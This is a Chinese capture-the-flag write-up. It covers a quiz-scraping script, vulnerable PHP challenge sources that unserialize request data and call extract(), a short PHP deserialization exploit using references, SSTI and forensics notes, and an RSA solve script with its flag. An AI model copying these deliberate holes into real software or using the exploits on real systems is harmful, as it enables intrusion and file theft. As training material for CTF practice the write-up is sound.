速算比赛

一个3秒速算30题,用python的requests库和BeautifulSoup库,写个爬虫就行(早应该备一点脚本的,现场写,血都被抢了)。

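import ast
import operator

import requests
from bs4 import BeautifulSoup

url = 'http://10.1.103.10/'

# Operators the arithmetic evaluator accepts. `**` is left out on purpose: a
# hostile page could send an exponent that never finishes computing. Add
# ast.Pow here only if the quiz really uses it.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def _safe_arith(expr):
    """Evaluate a plain arithmetic expression taken from the quiz page.

    The original script passed the scraped text to eval(). That text is
    chosen by the remote server, so eval() would run any Python expression
    the server decided to send on the solver's own machine. This walker
    accepts only numeric literals and the operators listed above.

    Raises:
        ValueError: the expression contains anything else (names, calls,
            attribute access, strings, ...).
        SyntaxError: the text is not a valid expression at all.
    """
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"unsupported expression: {expr!r}")

    return walk(ast.parse(expr.strip(), mode="eval"))


# One session for the whole run: the server presumably tracks progress
# through a session cookie (not visible from this script -- confirm).
session = requests.Session()
response = session.post(url=url)

# The writeup mentions 30 questions; the loop count of 31 is kept as published.
for _ in range(31):
    soup = BeautifulSoup(response.text, 'html.parser')
    # The question is the text node that directly follows the first <h1>.
    question = soup.find('h1').next_sibling.strip()
    question = question.replace("Calculate: ", "")
    answer = _safe_arith(question)
    response = session.post(url=url, data={'answer': answer})
    # NOTE(review): the published listing lost its indentation, so it is not
    # certain whether this print sat inside or after the loop. It is kept
    # inside so that every server reply is shown.
    print(response.text)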

image-20241201102659254

popmart

当时给了提示,相当于给了源代码。我发现auth.php授权后会跳转到tcClassLoad.php,以为预期解是先解auth.php,下一步再解tcClassLoad.php。于是盯着tcClassLoad.php写了半天的链子,在$_GET的变量覆盖那里卡了半天,最后还是没解出来,就去看其他题了。赛后问了其他师傅,才知道当时没注意到还有个p0pmart.php,而且题目也是p0pmart;前面可能是兔子洞,也可能是我太菜了。

tcClassLoad.php:

<?php
// Turns off all PHP error and warning output for this script.
error_reporting(0);
// auth.php is not shown on this page; according to the writeup it performs
// the authorisation step before redirecting to this file.
include "auth.php";


/**
 * Als: two public properties plus two magic methods that PHP calls implicitly.
 * Both properties are filled from the serialized input when the object is
 * created by unserialize().
 */
class Als
{
public $text;
public $dict;
// Called by PHP right after unserialize() rebuilds an Als object.
// When $text loosely equals "helloworld", init() is called (with no
// arguments) on whatever $dict holds.
public function __wakeup()
{
if ($this->text == "helloworld") {
$this->dict->init();
}
}
// Called by PHP when the object is used as a string (for example by echo).
// Writes a property named undefinedProperty on whatever $text holds, then
// returns the fixed string "HACKER".
public function __toString()
{

$this->text->undefinedProperty = 'New Value';

return "HACKER";
}
}

/**
 * Kl: reacts to calls of undefined methods (__call) and to reads of
 * undefined properties (__get). Contains the only file-read sink in this file.
 */
class Kl
{
public $apple;
public $phone;
public $var;

// Called by PHP when an undefined or inaccessible method is invoked.
// echo converts $apple to a string, so an object stored there has its
// __toString() run.
public function __call($name, $arguments)
{
echo $this->apple;
}

// Called by PHP when an undefined or inaccessible property is read.
public function __get($name)
{
// Variable-variables driven by the query string: the local variable named
// by each key receives the value of the local variable named by the
// matching value. Request input therefore decides which locals of this
// method are overwritten.
foreach ($_GET as $key => $value) {
$$key = $$value;
}
// NOTE(review): $_GET is normally an array, and an array does not loosely
// equal a string. PHP also documents that superglobals cannot be used as
// variable variables inside functions or methods -- verify on the target
// version. The writeup author reports getting stuck at this check.
if ($_GET == "Hack") {

if (isset($this->var)) {
$arr[$this->var] = 1;
// The condition is an append-assignment, not a comparison; the value it
// produces selects between die() and the file read below.
if ($arr[] = 1) {
die("Hack!!");
} else {
// File-read sink: the path is the $phone property, which the sender
// controls when the object was built by unserialize(). $content is not a
// declared property of Kl.
$this->content = file_get_contents($this->phone);

echo $this->content;
}
}
}
}
}

/**
 * Glb: stores two values through init() and reacts to writes on undefined
 * properties (__set).
 */
class Glb
{
public $boy;
public $gay;
// Not referenced anywhere in the code shown.
private $cc;

// Stores both arguments. Both are required, while the entry point at the
// bottom of this file calls init() without any.
public function init($a, $b)
{
$this->boy = $a;
$this->gay = $b;

}

// Called by PHP when an undefined or inaccessible property is written.
// If $boy is set, prints "1314" and reads ->name on whatever $boy holds;
// that read triggers __get() on an object that has no accessible name
// property. PHP ignores the value returned from __set().
public function __set($name, $value)
{

if (isset($this->boy)) {
print_r("1314");


return $this->boy->name;
}

}

}
// Entry point. unserialize() runs directly on the POST field "cmd", so the
// request body decides which of the classes above is instantiated and with
// which property values; __wakeup() fires during that call.
// Hardening: pass ['allowed_classes' => false] as the second argument
// (PHP 7+) or exchange data as JSON instead of serialized PHP objects.
if (isset($_POST['cmd'])) {
$serializecmd = $_POST['cmd'];
$unserializecmd = unserialize($serializecmd);
$unserializecmd->init();
} else {
// Without the field the script prints its own source.
highlight_file(__FILE__);
}


?>

p0pmart.php

<?php
// flag.php is not shown on this page; presumably it defines the globals
// $flag and $where_you_go that popmart::__wakeup() reads -- confirm.
require_once("flag.php");
// Prints this file's own source on every request.
highlight_file(__FILE__);
/**
 * popmart: prints the flag from __wakeup() when $molly is identical to the
 * secret value copied into $yuki.
 */
class popmart{
public $yuki;
public $molly;
public $dimoo;

// Sets default values. PHP does not run the constructor when an object is
// created by unserialize(), so these defaults do not apply on that path.
public function __construct(){
$this->yuki='tell me where';
$this->molly='dont_tell_you';
$this->dimoo="you_can_guess";
}

// Called by PHP right after unserialize() rebuilds the object.
public function __wakeup(){
global $flag;
global $where_you_go;
// Overwrites $yuki with the secret, so the value supplied for $yuki in the
// serialized input is discarded.
$this->yuki=$where_you_go;
// Strict comparison against the secret. The serialized format can carry PHP
// references between properties; if $molly and $yuki refer to one value,
// the assignment above changes both and this check passes without the
// sender knowing the secret.
if($this->molly === $this->yuki){
echo $flag;
}
}
}

// Request handling for p0pmart.php.
$pucky = $_GET['wq'];
if(isset($pucky)){
if($pucky==="二仙桥"){
// extract() imports every POST field as a variable in the current scope and,
// with its default flags, overwrites variables that already exist. A POST
// field named pucky therefore replaces the value checked above.
// Hardening: do not call extract() on request data; if it cannot be avoided,
// use EXTR_SKIP or a prefix.
extract($_POST);
// Execution only continues when $pucky was changed by the extract() call.
if($pucky==="二仙桥"){
die("<script>window.alert('说说看,你要去哪??');</script>");
}
// Object injection point: the now request-controlled string is unserialized,
// which runs popmart::__wakeup().
unserialize($pucky);
}
}

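这个p0pmart.php解法就很简单了,反序列化使用引用就行:让$molly成为$yuki的引用,__wakeup里把$where_you_go赋给$yuki时$molly也跟着变,严格比较自然成立。根源在于对请求数据直接调用extract()和unserialize()。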

exp:

<?php
// Local stand-in for the challenge class: same class name and the same three
// public properties in the same order, so the serialized form matches what
// p0pmart.php expects. No methods are needed to produce the serialized string.
class popmart
{
public $yuki;
public $molly;
public $dimoo;

}

// Build one object and print its serialized form.
$a=new popmart();
// Makes $molly a PHP reference to $yuki; serialize() records the reference,
// so both names still refer to one value after unserialize().
$a->molly=&$a->yuki;
echo serialize($a);

传参数,简单变量就好。

image-20241202155858942

Sal的图集

SSTI注入,payload打的时候好像是过滤了[',用__getitem__来替换。

image-20241201152924655

image-20241201131242381

evidence

内存取证

根据提示查看剪切板,跑出密码Dki98misc@irR32df

猜测是压缩包密码,直接找flag文件。

image-20241202160719436

image-20241202160926651

解密就出了,这题拿了三血。

findme

Windows磁盘取证

用Strings直接出密码Th1$isP@ssW0rd!

用Autopsy打开,找到flag.zip解压,跑出true flag

image-20241201143338075

image-20241201143048187

不良劫

foremost一下有个二维码

image-20241202185410842

修复一下,就能得到前半段flag。

image-20241202185707478

盲水印提取一下

image-20241202185237329

gza_Cracker

哥斯拉流量密钥爆破,但是我一眼就看出密码是Antsw0rd,要说为什么呢,就只能说是它给的连接密码是Antsowrd

image-20241202160131222

image-20241202160223445

image-20241201122839227

image-20241202153907301

ddd

给的e非常大,一眼就是维纳攻击,工具直接梭了。

image-20241202173659359

OpenRSA

随便试了一下pp的值,爆破也行

from Crypto.Util.number import *
import gmpy2

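# Challenge parameters as published: modulus, public exponent, ciphertext and
# the extra value s.
n = 91332943043957251900549627486310189996740089685835683300621629110943492183477268072298084280915990633551010090925404931181501528744693585078837081210712114190987563470157519717774234682286443126927653309723270524901176734059185014688925211350678028031584074094348200320194354359517392064299266428589467651877
e = 65537
c = 56047741088808471978777825274508389592730927600153384445849570005499054151546904431595413241700524283982925340735997036959411123465509486474875805374561817710368400036617625285408296984445244211890678298780346979950633523883426046251122190772687200378680540970303449180211765041573634411303625986012155354363
s = 85800895230491036216758530886003341168631461607188722404807814593592648170497231916924533123351386068154228324172747834362249217755009796485811038447281072462412691656306643440837354994979197958887259958930060878212841756145266179832110649310586242527945793993646330413532949285121357704413955480099382778653

# Guess for the small unknown term. Presumably s = p**2 + pp**2; the challenge
# source is not shown on this page -- confirm.
pp = 1

# iroot returns (floor_root, is_exact). Only the floor is used, as in the
# original; the exactness flag is deliberately not required, because the floor
# may still be the right p when the guess for pp is only approximately right.
p = gmpy2.iroot(s - pp**2, 2)[0]

# The original computed q = n // p unconditionally, which yields a meaningless
# q, d and plaintext when p is not a factor of n. Fail loudly instead.
if p < 2 or n % p != 0:
    raise ValueError(f"pp={pp} does not yield a factor of n; try another value")
q = n // p

d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)
print(long_to_bytes(m))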

DASCTF{luQ5xmNUKgEEDO_c5LoJCum}